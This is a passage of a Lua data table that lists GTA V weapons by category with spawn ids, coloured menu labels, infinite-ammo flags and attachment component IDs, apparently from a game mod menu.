  2433. {
  2434. name = '~h~~r~> ~s~Extended Magazine',
  2436. }
  2437. },
  2438. Flashlight = {
  2439. {
  2440. name = '~h~~r~> ~s~Flashlight',
  2441. id = 'COMPONENT_AT_AR_FLSH'
  2442. }
  2443. },
  2444. BarrelAttachments = {
  2445. {
  2446. name = '~h~~r~> ~s~Suppressor',
  2447. id = 'COMPONENT_AT_AR_SUPP'
  2448. }
  2449. },
  2450. Grips = {
  2451. {
  2452. name = '~h~~r~> ~s~Grip',
  2454. }
  2455. }
  2456. }
  2457. },
  2458. BullpupShotgun = {
  2459. id = 'weapon_bullpupshotgun',
  2460. name = '~h~~r~> ~s~Bullpup Shotgun',
  2461. bInfAmmo = false,
  2462. mods = {
  2463. Flashlight = {
  2464. {
  2465. name = '~h~~r~> ~s~Flashlight',
  2466. id = 'COMPONENT_AT_AR_FLSH'
  2467. }
  2468. },
  2469. BarrelAttachments = {
  2470. {
  2471. name = '~h~~r~> ~s~Suppressor',
  2472. id = 'COMPONENT_AT_AR_SUPP_02'
  2473. }
  2474. },
  2475. Grips = {
  2476. {
  2477. name = '~h~~r~> ~s~Grip',
  2479. }
  2480. }
  2481. }
  2482. },
  2483. Musket = {
  2484. id = 'weapon_musket',
  2485. name = '~h~~r~> ~s~Musket',
  2486. bInfAmmo = false,
  2487. mods = {}
  2488. },
  2489. HeavyShotgun = {
  2490. id = 'weapon_heavyshotgun',
  2491. name = '~h~~r~> ~s~Heavy Shotgun',
  2492. bInfAmmo = false,
  2493. mods = {
  2494. Magazines = {
  2495. {
  2496. name = '~h~~r~> ~s~Default Magazine',
  2498. },
  2499. {
  2500. name = '~h~~r~> ~s~Extended Magazine',
  2502. },
  2503. {
  2504. name = '~h~~r~> ~s~Drum Magazine',
  2506. }
  2507. },
  2508. Flashlight = {
  2509. {
  2510. name = '~h~~r~> ~s~Flashlight',
  2511. id = 'COMPONENT_AT_AR_FLSH'
  2512. }
  2513. },
  2514. BarrelAttachments = {
  2515. {
  2516. name = '~h~~r~> ~s~Suppressor',
  2517. id = 'COMPONENT_AT_AR_SUPP_02'
  2518. }
  2519. },
  2520. Grips = {
  2521. {
  2522. name = '~h~~r~> ~s~Grip',
  2524. }
  2525. }
  2526. }
  2527. },
  2528. DoubleBarrelShotgun = {
  2529. id = 'weapon_dbshotgun',
  2530. name = '~h~~r~> ~s~Double Barrel Shotgun',
  2531. bInfAmmo = false,
  2532. mods = {}
  2533. },
  2534. SweeperShotgun = {
  2535. id = 'weapon_autoshotgun',
  2536. name = '~h~~r~> ~s~Sweeper Shotgun',
  2537. bInfAmmo = false,
  2538. mods = {}
  2539. }
  2540. },
  2541. AssaultRifles = {
  2542. AssaultRifle = {
  2543. id = 'weapon_assaultrifle',
  2544. name = '~h~~r~> ~s~Assault Rifle',
  2545. bInfAmmo = false,
  2546. mods = {
  2547. Magazines = {
  2548. {
  2549. name = '~h~~r~> ~s~Default Magazine',
  2551. },
  2552. {
  2553. name = '~h~~r~> ~s~Extended Magazine',
  2555. },
  2556. {
  2557. name = '~h~~r~> ~s~Drum Magazine',
  2559. }
  2560. },
  2561. Sights = {
  2562. {
  2563. name = '~h~~r~> ~s~Scope',
  2565. }
  2566. },
  2567. Flashlight = {
  2568. {
  2569. name = '~h~~r~> ~s~Flashlight',
  2570. id = 'COMPONENT_AT_AR_FLSH'
  2571. }
  2572. },
  2573. BarrelAttachments = {
  2574. {
  2575. name = '~h~~r~> ~s~Suppressor',
  2576. id = 'COMPONENT_AT_AR_SUPP_02'
  2577. }
  2578. },
  2579. Grips = {
  2580. {
  2581. name = '~h~~r~> ~s~Grip',
  2583. }
  2584. }
  2585. }
  2586. },
  2587. AssaultRifleMkII = {
  2588. id = 'weapon_assaultrifle_mk2',
  2589. name = '~h~~r~> ~s~Assault Rifle Mk II',
  2590. bInfAmmo = false,
  2591. mods = {
  2592. Magazines = {
  2593. {
  2594. name = '~h~~r~> ~s~Default Magazine',
  2596. },
  2597. {
  2598. name = '~h~~r~> ~s~Extended Magazine',
  2600. },
  2601. {
  2602. name = '~h~~r~> ~s~Tracer Rounds',
  2604. },
  2605. {
  2606. name = '~h~~r~> ~s~Incendiary Rounds',
  2608. },
  2609. {
  2610. name = '~h~~r~> ~s~Hollow Point Rounds',
  2612. },
  2613. {
  2614. name = '~h~~r~> ~s~FMJ Rounds',
  2616. }
  2617. },
  2618. Sights = {
  2619. {
  2620. name = '~h~~r~> ~s~Holograhpic Sight',
  2621. id = 'COMPONENT_AT_SIGHTS'
  2622. },
  2623. {
  2624. name = '~h~~r~> ~s~Small Scope',
  2626. },
  2627. {
  2628. name = '~h~~r~> ~s~Large Scope',
  2630. }
  2631. },
  2632. Flashlight = {
  2633. {
  2634. name = '~h~~r~> ~s~Flashlight',
  2635. id = 'COMPONENT_AT_AR_FLSH'
  2636. }
  2637. },
  2638. Barrel = {
  2639. {
  2640. name = '~h~~r~> ~s~Default',
  2641. id = 'COMPONENT_AT_AR_BARREL_01'
  2642. },
  2643. {
  2644. name = '~h~~r~> ~s~Heavy',
  2645. id = 'COMPONENT_AT_AR_BARREL_0'
  2646. }
  2647. },
  2648. BarrelAttachments = {
  2649. {
  2650. name = '~h~~r~> ~s~Suppressor',
  2651. id = 'COMPONENT_AT_AR_SUPP_02'
  2652. },
  2653. {
  2654. name = '~h~~r~> ~s~Flat Muzzle Brake',
  2655. id = 'COMPONENT_AT_MUZZLE_01'
  2656. },
  2657. {
  2658. name = '~h~~r~> ~s~Tactical Muzzle Brake',
  2659. id = 'COMPONENT_AT_MUZZLE_02'
  2660. },
  2661. {
  2662. name = '~h~~r~> ~s~Fat-End Muzzle Brake',
  2663. id = 'COMPONENT_AT_MUZZLE_03'
  2664. },
  2665. {
  2666. name = '~h~~r~> ~s~Precision Muzzle Brake',
  2667. id = 'COMPONENT_AT_MUZZLE_04'
  2668. },
  2669. {
  2670. name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
  2671. id = 'COMPONENT_AT_MUZZLE_05'
  2672. },
  2673. {
  2674. name = '~h~~r~> ~s~Slanted Muzzle Brake',
  2675. id = 'COMPONENT_AT_MUZZLE_06'
  2676. },
  2677. {
  2678. name = '~h~~r~> ~s~Split-End Muzzle Brake',
  2679. id = 'COMPONENT_AT_MUZZLE_07'
  2680. }
  2681. },
  2682. Grips = {
  2683. {
  2684. name = '~h~~r~> ~s~Grip',
  2685. id = 'COMPONENT_AT_AR_AFGRIP_02'
  2686. }
  2687. }
  2688. }
  2689. },
  2690. CarbineRifle = {
  2691. id = 'weapon_carbinerifle',
  2692. name = '~h~~r~> ~s~Carbine Rifle',
  2693. bInfAmmo = false,
  2694. mods = {
  2695. Magazines = {
  2696. {
  2697. name = '~h~~r~> ~s~Default Magazine',
  2699. },
  2700. {
  2701. name = '~h~~r~> ~s~Extended Magazine',
  2703. },
  2704. {
  2705. name = '~h~~r~> ~s~Box Magazine',
  2707. }
  2708. },
  2709. Sights = {
  2710. {
  2711. name = '~h~~r~> ~s~Scope',
  2713. }
  2714. },
  2715. Flashlight = {
  2716. {
  2717. name = '~h~~r~> ~s~Flashlight',
  2718. id = 'COMPONENT_AT_AR_FLSH'
  2719. }
  2720. },
  2721. BarrelAttachments = {
  2722. {
  2723. name = '~h~~r~> ~s~Suppressor',
  2724. id = 'COMPONENT_AT_AR_SUPP'
  2725. }
  2726. },
  2727. Grips = {
  2728. {
  2729. name = '~h~~r~> ~s~Grip',
  2731. }
  2732. }
  2733. }
  2734. },
  2735. CarbineRifleMkII = {
  2736. id = 'weapon_carbinerifle_mk2',
  2737. name = '~h~~r~> ~s~Carbine Rifle Mk II ',
  2738. bInfAmmo = false,
  2739. mods = {
  2740. Magazines = {
  2741. {
  2742. name = '~h~~r~> ~s~Default Magazine',
  2744. },
  2745. {
  2746. name = '~h~~r~> ~s~Extended Magazine',
  2748. },
  2749. {
  2750. name = '~h~~r~> ~s~Tracer Rounds',
  2752. },
  2753. {
  2754. name = '~h~~r~> ~s~Incendiary Rounds',
  2756. },
  2757. {
  2758. name = '~h~~r~> ~s~Hollow Point Rounds',
  2760. },
  2761. {
  2762. name = '~h~~r~> ~s~FMJ Rounds',
  2764. }
  2765. },
  2766. Sights = {
  2767. {
  2768. name = '~h~~r~> ~s~Holograhpic Sight',
  2769. id = 'COMPONENT_AT_SIGHTS'
  2770. },
  2771. {
  2772. name = '~h~~r~> ~s~Small Scope',
  2774. },
  2775. {
  2776. name = '~h~~r~> ~s~Large Scope',
  2778. }
  2779. },
  2780. Flashlight = {
  2781. {
  2782. name = '~h~~r~> ~s~Flashlight',
  2783. id = 'COMPONENT_AT_AR_FLSH'
  2784. }
  2785. },
  2786. Barrel = {
  2787. {
  2788. name = '~h~~r~> ~s~Default',
  2789. id = 'COMPONENT_AT_CR_BARREL_01'
  2790. },
  2791. {
  2792. name = '~h~~r~> ~s~Heavy',
  2793. id = 'COMPONENT_AT_CR_BARREL_02'
  2794. }
  2795. },
  2796. BarrelAttachments = {
  2797. {
  2798. name = '~h~~r~> ~s~Suppressor',
  2799. id = 'COMPONENT_AT_AR_SUPP'
  2800. },
  2801. {
  2802. name = '~h~~r~> ~s~Flat Muzzle Brake',
  2803. id = 'COMPONENT_AT_MUZZLE_01'
  2804. },
  2805. {
  2806. name = '~h~~r~> ~s~Tactical Muzzle Brake',
  2807. id = 'COMPONENT_AT_MUZZLE_02'
  2808. },
  2809. {
  2810. name = '~h~~r~> ~s~Fat-End Muzzle Brake',
  2811. id = 'COMPONENT_AT_MUZZLE_03'
  2812. },
  2813. {
  2814. name = '~h~~r~> ~s~Precision Muzzle Brake',
  2815. id = 'COMPONENT_AT_MUZZLE_04'
  2816. },
  2817. {
  2818. name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
  2819. id = 'COMPONENT_AT_MUZZLE_05'
  2820. },
  2821. {
  2822. name = '~h~~r~> ~s~Slanted Muzzle Brake',
  2823. id = 'COMPONENT_AT_MUZZLE_06'
  2824. },
  2825. {
  2826. name = '~h~~r~> ~s~Split-End Muzzle Brake',
  2827. id = 'COMPONENT_AT_MUZZLE_07'
  2828. }
  2829. },
  2830. Grips = {
  2831. {
  2832. name = '~h~~r~> ~s~Grip',
  2833. id = 'COMPONENT_AT_AR_AFGRIP_02'
  2834. }
  2835. }
  2836. }
  2837. },
  2838. AdvancedRifle = {
  2839. id = 'weapon_advancedrifle',
  2840. name = '~h~~r~> ~s~Advanced Rifle ',
  2841. bInfAmmo = false,
  2842. mods = {
  2843. Magazines = {
  2844. {
  2845. name = '~h~~r~> ~s~Default Magazine',
  2847. },
  2848. {
  2849. name = '~h~~r~> ~s~Extended Magazine',
  2851. }
  2852. },
  2853. Sights = {
  2854. {
  2855. name = '~h~~r~> ~s~Scope',
  2857. }
  2858. },
  2859. Flashlight = {
  2860. {
  2861. name = '~h~~r~> ~s~Flashlight',
  2862. id = 'COMPONENT_AT_AR_FLSH'
  2863. }
  2864. },
  2865. BarrelAttachments = {
  2866. {
  2867. name = '~h~~r~> ~s~Suppressor',
  2868. id = 'COMPONENT_AT_AR_SUPP'
  2869. }
  2870. }
  2871. }
  2872. },
  2873. SpecialCarbine = {
  2874. id = 'weapon_specialcarbine',
  2875. name = '~h~~r~> ~s~Special Carbine',
  2876. bInfAmmo = false,
  2877. mods = {
  2878. Magazines = {
  2879. {
  2880. name = '~h~~r~> ~s~Default Magazine',
  2882. },
  2883. {
  2884. name = '~h~~r~> ~s~Extended Magazine',
  2886. },
  2887. {
  2888. name = '~h~~r~> ~s~Drum Magazine',
  2890. }
  2891. },
  2892. Sights = {
  2893. {
  2894. name = '~h~~r~> ~s~Scope',
  2896. }
  2897. },
  2898. Flashlight = {
  2899. {
  2900. name = '~h~~r~> ~s~Flashlight',
  2901. id = 'COMPONENT_AT_AR_FLSH'
  2902. }
  2903. },
  2904. BarrelAttachments = {
  2905. {
  2906. name = '~h~~r~> ~s~Suppressor',
  2907. id = 'COMPONENT_AT_AR_SUPP_02'
  2908. }
  2909. },
  2910. Grips = {
  2911. {
  2912. name = '~h~~r~> ~s~Grip',
  2914. }
  2915. }
  2916. }
  2917. },
  2918. SpecialCarbineMkII = {
  2919. id = 'weapon_specialcarbine_mk2',
  2920. name = '~h~~r~> ~s~Special Carbine Mk II',
  2921. bInfAmmo = false,
  2922. mods = {
  2923. Magazines = {
  2924. {
  2925. name = '~h~~r~> ~s~Default Magazine',
  2927. },
  2928. {
  2929. name = '~h~~r~> ~s~Extended Magazine',
  2931. },
  2932. {
  2933. name = '~h~~r~> ~s~Tracer Rounds',
  2935. },
  2936. {
  2937. name = '~h~~r~> ~s~Incendiary Rounds',
  2939. },
  2940. {
  2941. name = '~h~~r~> ~s~Hollow Point Rounds',
  2943. },
  2944. {
  2945. name = '~h~~r~> ~s~FMJ Rounds',
  2947. }
  2948. },
  2949. Sights = {
  2950. {
  2951. name = '~h~~r~> ~s~Holograhpic Sight',
  2952. id = 'COMPONENT_AT_SIGHTS'
  2953. },
  2954. {
  2955. name = '~h~~r~> ~s~Small Scope',
  2957. },
  2958. {
  2959. name = '~h~~r~> ~s~Large Scope',
  2961. }
  2962. },
  2963. Flashlight = {
  2964. {
  2965. name = '~h~~r~> ~s~Flashlight',
  2966. id = 'COMPONENT_AT_AR_FLSH'
  2967. }
  2968. },
  2969. Barrel = {
  2970. {
  2971. name = '~h~~r~> ~s~Default',
  2972. id = 'COMPONENT_AT_SC_BARREL_01'
  2973. },
  2974. {
  2975. name = '~h~~r~> ~s~Heavy',
  2976. id = 'COMPONENT_AT_SC_BARREL_02'
  2977. }
  2978. },
  2979. BarrelAttachments = {
  2980. {
  2981. name = '~h~~r~> ~s~Suppressor',
  2982. id = 'COMPONENT_AT_AR_SUPP_02'
  2983. },
  2984. {
  2985. name = '~h~~r~> ~s~Flat Muzzle Brake',
  2986. id = 'COMPONENT_AT_MUZZLE_01'
  2987. },
  2988. {
  2989. name = '~h~~r~> ~s~Tactical Muzzle Brake',
  2990. id = 'COMPONENT_AT_MUZZLE_02'
  2991. },
  2992. {
  2993. name = '~h~~r~> ~s~Fat-End Muzzle Brake',
  2994. id = 'COMPONENT_AT_MUZZLE_03'
  2995. },
  2996. {
  2997. name = '~h~~r~> ~s~Precision Muzzle Brake',
  2998. id = 'COMPONENT_AT_MUZZLE_04'
  2999. },
  3000. {
  3001. name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
  3002. id = 'COMPONENT_AT_MUZZLE_05'
  3003. },
  3004. {
  3005. name = '~h~~r~> ~s~Slanted Muzzle Brake',
  3006. id = 'COMPONENT_AT_MUZZLE_06'
  3007. },
  3008. {
  3009. name = '~h~~r~> ~s~Split-End Muzzle Brake',
  3010. id = 'COMPONENT_AT_MUZZLE_07'
  3011. }
  3012. },
  3013. Grips = {
  3014. {
  3015. name = '~h~~r~> ~s~Grip',
  3016. id = 'COMPONENT_AT_AR_AFGRIP_02'
  3017. }
  3018. }
  3019. }
  3020. },
  3021. BullpupRifle = {
  3022. id = 'weapon_bullpuprifle',
  3023. name = '~h~~r~> ~s~Bullpup Rifle',
  3024. bInfAmmo = false,
  3025. mods = {
  3026. Magazines = {
  3027. {
  3028. name = '~h~~r~> ~s~Default Magazine',
  3030. },
  3031. {
  3032. name = '~h~~r~> ~s~Extended Magazine',
  3034. }
  3035. },
  3036. Sights = {
  3037. {
  3038. name = '~h~~r~> ~s~Scope',
  3040. }
  3041. },
  3042. Flashlight = {
  3043. {
  3044. name = '~h~~r~> ~s~Flashlight',
  3045. id = 'COMPONENT_AT_AR_FLSH'
  3046. }
  3047. },
  3048. BarrelAttachments = {
  3049. {
  3050. name = '~h~~r~> ~s~Suppressor',
  3051. id = 'COMPONENT_AT_AR_SUPP'
  3052. }
  3053. },
  3054. Grips = {
  3055. {
  3056. name = '~h~~r~> ~s~Grip',
  3058. }
  3059. }
  3060. }
  3061. },
  3062. BullpupRifleMkII = {
  3063. id = 'weapon_bullpuprifle_mk2',
  3064. name = '~h~~r~> ~s~Bullpup Rifle Mk II',
  3065. bInfAmmo = false,
  3066. mods = {
  3067. Magazines = {
  3068. {
  3069. name = '~h~~r~> ~s~Default Magazine',
  3071. },
  3072. {
  3073. name = '~h~~r~> ~s~Extended Magazine',
  3075. },
  3076. {
  3077. name = '~h~~r~> ~s~Tracer Rounds',
  3079. },
  3080. {
  3081. name = '~h~~r~> ~s~Incendiary Rounds',
  3083. },
  3084. {
  3085. name = '~h~~r~> ~s~Armor Piercing Rounds',
  3087. },
  3088. {
  3089. name = '~h~~r~> ~s~FMJ Rounds',
  3091. }
  3092. },
  3093. Sights = {
  3094. {
  3095. name = '~h~~r~> ~s~Holograhpic Sight',
  3096. id = 'COMPONENT_AT_SIGHTS'
  3097. },
  3098. {
  3099. name = '~h~~r~> ~s~Small Scope',
  3100. id = 'COMPONENT_AT_SCOPE_MACRO_02_MK2'
  3101. },
  3102. {
  3103. name = '~h~~r~> ~s~Medium Scope',
  3105. }
  3106. },
  3107. Flashlight = {
  3108. {
  3109. name = '~h~~r~> ~s~Flashlight',
  3110. id = 'COMPONENT_AT_AR_FLSH'
  3111. }
  3112. },
  3113. Barrel = {
  3114. {
  3115. name = '~h~~r~> ~s~Default',
  3116. id = 'COMPONENT_AT_BP_BARREL_01'
  3117. },
  3118. {
  3119. name = '~h~~r~> ~s~Heavy',
  3120. id = 'COMPONENT_AT_BP_BARREL_02'
  3121. }
  3122. },
  3123. BarrelAttachments = {
  3124. {
  3125. name = '~h~~r~> ~s~Suppressor',
  3126. id = 'COMPONENT_AT_AR_SUPP'
  3127. },
  3128. {
  3129. name = '~h~~r~> ~s~Flat Muzzle Brake',
  3130. id = 'COMPONENT_AT_MUZZLE_01'
  3131. },
  3132. {
  3133. name = '~h~~r~> ~s~Tactical Muzzle Brake',
  3134. id = 'COMPONENT_AT_MUZZLE_02'
  3135. },
  3136. {
  3137. name = '~h~~r~> ~s~Fat-End Muzzle Brake',
  3138. id = 'COMPONENT_AT_MUZZLE_03'
  3139. },
  3140. {
  3141. name = '~h~~r~> ~s~Precision Muzzle Brake',
  3142. id = 'COMPONENT_AT_MUZZLE_04'
  3143. },
  3144. {
  3145. name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
  3146. id = 'COMPONENT_AT_MUZZLE_05'
  3147. },
  3148. {
  3149. name = '~h~~r~> ~s~Slanted Muzzle Brake',
  3150. id = 'COMPONENT_AT_MUZZLE_06'
  3151. },
  3152. {
  3153. name = '~h~~r~> ~s~Split-End Muzzle Brake',
  3154. id = 'COMPONENT_AT_MUZZLE_07'
  3155. }
  3156. },
  3157. Grips = {
  3158. {
  3159. name = '~h~~r~> ~s~Grip',
  3161. }
  3162. }
  3163. }
  3164. },
  3165. CompactRifle = {
  3166. id = 'weapon_compactrifle',
  3167. name = '~h~~r~> ~s~Compact Rifle',
  3168. bInfAmmo = false,
  3169. mods = {
  3170. Magazines = {
  3171. {
  3172. name = '~h~~r~> ~s~Default Magazine',
  3174. },
  3175. {
  3176. name = '~h~~r~> ~s~Extended Magazine',
  3178. },
  3179. {
  3180. name = '~h~~r~> ~s~Drum Magazine',
  3182. }
  3183. }
  3184. }
  3185. }
  3186. },
  3187. LMG = {
  3188. MG = {
  3189. id = 'weapon_mg',
  3190. name = '~h~~r~> ~s~MG',
  3191. bInfAmmo = false,
  3192. mods = {
  3193. Magazines = {
  3194. {
  3195. name = '~h~~r~> ~s~Default Magazine',
  3196. id = 'COMPONENT_MG_CLIP_01'
  3197. },
  3198. {
  3199. name = '~h~~r~> ~s~Extended Magazine',
  3200. id = 'COMPONENT_MG_CLIP_02'
  3201. }
  3202. },
  3203. Sights = {
  3204. {
  3205. name = '~h~~r~> ~s~Scope',
  3206. id = 'COMPONENT_AT_SCOPE_SMALL_02'
  3207. }
  3208. }
  3209. }
  3210. },
  3211. CombatMG = {
  3212. id = 'weapon_combatmg',
  3213. name = '~h~~r~> ~s~Combat MG',
  3214. bInfAmmo = false,
  3215. mods = {
  3216. Magazines = {
  3217. {
  3218. name = '~h~~r~> ~s~Default Magazine',
  3220. },
  3221. {
  3222. name = '~h~~r~> ~s~Extended Magazine',
  3224. }
  3225. },
  3226. Sights = {
  3227. {
  3228. name = '~h~~r~> ~s~Scope',
  3230. }
  3231. },
  3232. Grips = {
  3233. {
  3234. name = '~h~~r~> ~s~Grip',
  3236. }
  3237. }
  3238. }
  3239. },
  3240. CombatMGMkII = {
  3241. id = 'weapon_combatmg_mk2',
  3242. name = '~h~~r~> ~s~Combat MG Mk II',
  3243. bInfAmmo = false,
  3244. mods = {
  3245. Magazines = {
  3246. {
  3247. name = '~h~~r~> ~s~Default Magazine',
  3249. },
  3250. {
  3251. name = '~h~~r~> ~s~Extended Magazine',
  3253. },
  3254. {
  3255. name = '~h~~r~> ~s~Tracer Rounds',
  3257. },
  3258. {
  3259. name = '~h~~r~> ~s~Incendiary Rounds',
  3261. },
  3262. {
  3263. name = '~h~~r~> ~s~Hollow Point Rounds',
  3265. },
  3266. {
  3267. name = '~h~~r~> ~s~FMJ Rounds',
  3269. }
  3270. },
  3271. Sights = {
  3272. {
  3273. name = '~h~~r~> ~s~Holograhpic Sight',
  3274. id = 'COMPONENT_AT_SIGHTS'
  3275. },
  3276. {
  3277. name = '~h~~r~> ~s~Medium Scope',
  3279. },
  3280. {
  3281. name = '~h~~r~> ~s~Large Scope',
  3283. }
  3284. },
  3285. Barrel = {
  3286. {
  3287. name = '~h~~r~> ~s~Default',
  3288. id = 'COMPONENT_AT_MG_BARREL_01'
  3289. },
  3290. {
  3291. name = '~h~~r~> ~s~Heavy',
  3292. id = 'COMPONENT_AT_MG_BARREL_02'
  3293. }
  3294. },
  3295. BarrelAttachments = {
  3296. {
  3297. name = '~h~~r~> ~s~Flat Muzzle Brake',
  3298. id = 'COMPONENT_AT_MUZZLE_01'
  3299. },
  3300. {
  3301. name = '~h~~r~> ~s~Tactical Muzzle Brake',
  3302. id = 'COMPONENT_AT_MUZZLE_02'
  3303. },
  3304. {
  3305. name = '~h~~r~> ~s~Fat-End Muzzle Brake',
  3306. id = 'COMPONENT_AT_MUZZLE_03'
  3307. },
  3308. {
  3309. name = '~h~~r~> ~s~Precision Muzzle Brake',
  3310. id = 'COMPONENT_AT_MUZZLE_04'
  3311. },
  3312. {
  3313. name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
  3314. id = 'COMPONENT_AT_MUZZLE_05'
  3315. },
  3316. {
  3317. name = '~h~~r~> ~s~Slanted Muzzle Brake',
  3318. id = 'COMPONENT_AT_MUZZLE_06'
  3319. },
  3320. {
  3321. name = '~h~~r~> ~s~Split-End Muzzle Brake',
  3322. id = 'COMPONENT_AT_MUZZLE_07'
  3323. }
  3324. },
  3325. Grips = {
  3326. {
  3327. name = '~h~~r~> ~s~Grip',
  3328. id = 'COMPONENT_AT_AR_AFGRIP_02'
  3329. }
  3330. }
  3331. }
  3332. },
  3333. GusenbergSweeper = {
  3334. id = 'weapon_gusenberg',
  3335. name = '~h~~r~> ~s~GusenbergSweeper',
  3336. bInfAmmo = false,
  3337. mods = {
  3338. Magazines = {
  3339. {
  3340. name = '~h~~r~> ~s~Default Magazine',
  3342. },
  3343. {
  3344. name = '~h~~r~> ~s~Extended Magazine',
  3346. }
  3347. }
  3348. }
  3349. }
  3350. },
  3351. Snipers = {
  3352. SniperRifle = {
  3353. id = 'weapon_sniperrifle',
  3354. name = '~h~~r~> ~s~Sniper Rifle',
  3355. bInfAmmo = false,
  3356. mods = {
  3357. Sights = {
  3358. {
  3359. name = '~h~~r~> ~s~Scope',
  3361. },
  3362. {
  3363. name = '~h~~r~> ~s~Advanced Scope',
  3365. }
  3366. },
  3367. BarrelAttachments = {
  3368. {
  3369. name = '~h~~r~> ~s~Suppressor',
  3370. id = 'COMPONENT_AT_AR_SUPP_02'
  3371. }
  3372. }
  3373. }
  3374. },
  3375. HeavySniper = {
  3376. id = 'weapon_heavysniper',
  3377. name = '~h~~r~> ~s~Heavy Sniper',
  3378. bInfAmmo = false,
  3379. mods = {
  3380. Sights = {
  3381. {
  3382. name = '~h~~r~> ~s~Scope',
  3384. },
  3385. {
  3386. name = '~h~~r~> ~s~Advanced Scope',
  3388. }
  3389. }
  3390. }
  3391. },
  3392. HeavySniperMkII = {
  3393. id = 'weapon_heavysniper_mk2',
  3394. name = '~h~~r~> ~s~Heavy Sniper Mk II',
  3395. bInfAmmo = false,
  3396. mods = {
  3397. Magazines = {
  3398. {
  3399. name = '~h~~r~> ~s~Default Magazine',
  3401. },
  3402. {
  3403. name = '~h~~r~> ~s~Extended Magazine',
  3405. },
  3406. {
  3407. name = '~h~~r~> ~s~Incendiary Rounds',
  3409. },
  3410. {
  3411. name = '~h~~r~> ~s~Armor Piercing Rounds',
  3413. },
  3414. {
  3415. name = '~h~~r~> ~s~FMJ Rounds',
  3417. },
  3418. {
  3419. name = '~h~~r~> ~s~Explosive Rounds',
  3421. }
  3422. },
  3423. Sights = {
  3424. {
  3425. name = '~h~~r~> ~s~Zoom Scope',
  3427. },
  3428. {
  3429. name = '~h~~r~> ~s~Advanced Scope',
  3431. },
  3432. {
  3433. name = '~h~~r~> ~s~Nigt Vision Scope',
  3434. id = 'COMPONENT_AT_SCOPE_NV'
  3435. },
  3436. {
  3437. name = '~h~~r~> ~s~Thermal Scope',
  3439. }
  3440. },
  3441. Barrel = {
  3442. {
  3443. name = '~h~~r~> ~s~Default',
  3444. id = 'COMPONENT_AT_SR_BARREL_01'
  3445. },
  3446. {
  3447. name = '~h~~r~> ~s~Heavy',
  3448. id = 'COMPONENT_AT_SR_BARREL_02'
  3449. }
  3450. },
  3451. BarrelAttachments = {
  3452. {
  3453. name = '~h~~r~> ~s~Suppressor',
  3454. id = 'COMPONENT_AT_SR_SUPP_03'
  3455. },
  3456. {
  3457. name = '~h~~r~> ~s~Squared Muzzle Brake',
  3458. id = 'COMPONENT_AT_MUZZLE_08'
  3459. },
  3460. {
  3461. name = '~h~~r~> ~s~Bell-End Muzzle Brake',
  3462. id = 'COMPONENT_AT_MUZZLE_09'
  3463. }
  3464. }
  3465. }
  3466. },
  3467. MarksmanRifle = {
  3468. id = 'weapon_marksmanrifle',
  3469. name = '~h~~r~> ~s~Marksman Rifle',
  3470. bInfAmmo = false,
  3471. mods = {
  3472. Magazines = {
  3473. {
  3474. name = '~h~~r~> ~s~Default Magazine',
  3476. },
  3477. {
  3478. name = '~h~~r~> ~s~Extended Magazine',
  3480. }
  3481. },
  3482. Sights = {
  3483. {
  3484. name = '~h~~r~> ~s~Scope',
  3486. }
  3487. },
  3488. Flashlight = {
  3489. {
  3490. name = '~h~~r~> ~s~Flashlight',
  3491. id = 'COMPONENT_AT_AR_FLSH'
  3492. }
  3493. },
  3494. BarrelAttachments = {
  3495. {
  3496. name = '~h~~r~> ~s~Suppressor',
  3497. id = 'COMPONENT_AT_AR_SUPP'
  3498. }
  3499. },
  3500. Grips = {
  3501. {
  3502. name = '~h~~r~> ~s~Grip',
  3504. }
  3505. }
  3506. }
  3507. },
  3508. MarksmanRifleMkII = {
  3509. id = 'weapon_marksmanrifle_mk2',
  3510. name = '~h~~r~> ~s~Marksman Rifle Mk II',
  3511. bInfAmmo = false,
  3512. mods = {
  3513. Magazines = {
  3514. {
  3515. name = '~h~~r~> ~s~Default Magazine',
  3517. },
  3518. {
  3519. name = '~h~~r~> ~s~Extended Magazine',
  3521. },
  3522. {
  3523. name = '~h~~r~> ~s~Tracer Rounds',
  3525. },
  3526. {
  3527. name = '~h~~r~> ~s~Incendiary Rounds',
  3529. },
  3530. {
  3531. name = '~h~~r~> ~s~Hollow Point Rounds',
  3533. },
  3534. {
  3535. name = '~h~~r~> ~s~FMJ Rounds',
  3537. }
  3538. },
  3539. Sights = {
  3540. {
  3541. name = '~h~~r~> ~s~Holograhpic Sight',
  3542. id = 'COMPONENT_AT_SIGHTS'
  3543. },
  3544. {
  3545. name = '~h~~r~> ~s~Large Scope',
  3547. },
  3548. {
  3549. name = '~h~~r~> ~s~Zoom Scope',
  3551. }
  3552. },
  3553. Flashlight = {
  3554. {
  3555. name = '~h~~r~> ~s~Flashlight',
  3556. id = 'COMPONENT_AT_AR_FLSH'
  3557. }
  3558. },
  3559. Barrel = {
  3560. {
  3561. name = '~h~~r~> ~s~Default',
  3562. id = 'COMPONENT_AT_MRFL_BARREL_01'
  3563. },
  3564. {
  3565. name = '~h~~r~> ~s~Heavy',
  3566. id = 'COMPONENT_AT_MRFL_BARREL_02'
  3567. }
  3568. },
  3569. BarrelAttachments = {
  3570. {
  3571. name = '~h~~r~> ~s~Suppressor',
  3572. id = 'COMPONENT_AT_AR_SUPP'
  3573. },
  3574. {
  3575. name = '~h~~r~> ~s~Flat Muzzle Brake',
  3576. id = 'COMPONENT_AT_MUZZLE_01'
  3577. },
  3578. {
  3579. name = '~h~~r~> ~s~Tactical Muzzle Brake',
  3580. id = 'COMPONENT_AT_MUZZLE_02'
  3581. },
  3582. {
  3583. name = '~h~~r~> ~s~Fat-End Muzzle Brake',
  3584. id = 'COMPONENT_AT_MUZZLE_03'
  3585. },
  3586. {
  3587. name = '~h~~r~> ~s~Precision Muzzle Brake',
  3588. id = 'COMPONENT_AT_MUZZLE_04'
  3589. },
  3590. {
  3591. name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
  3592. id = 'COMPONENT_AT_MUZZLE_05'
  3593. },
  3594. {
  3595. name = '~h~~r~> ~s~Slanted Muzzle Brake',
  3596. id = 'COMPONENT_AT_MUZZLE_06'
  3597. },
  3598. {
  3599. name = '~h~~r~> ~s~Split-End Muzzle Brake',
  3600. id = 'COMPONENT_AT_MUZZLE_07'
  3601. }
  3602. },
  3603. Grips = {
  3604. {
  3605. name = '~h~~r~> ~s~Grip',
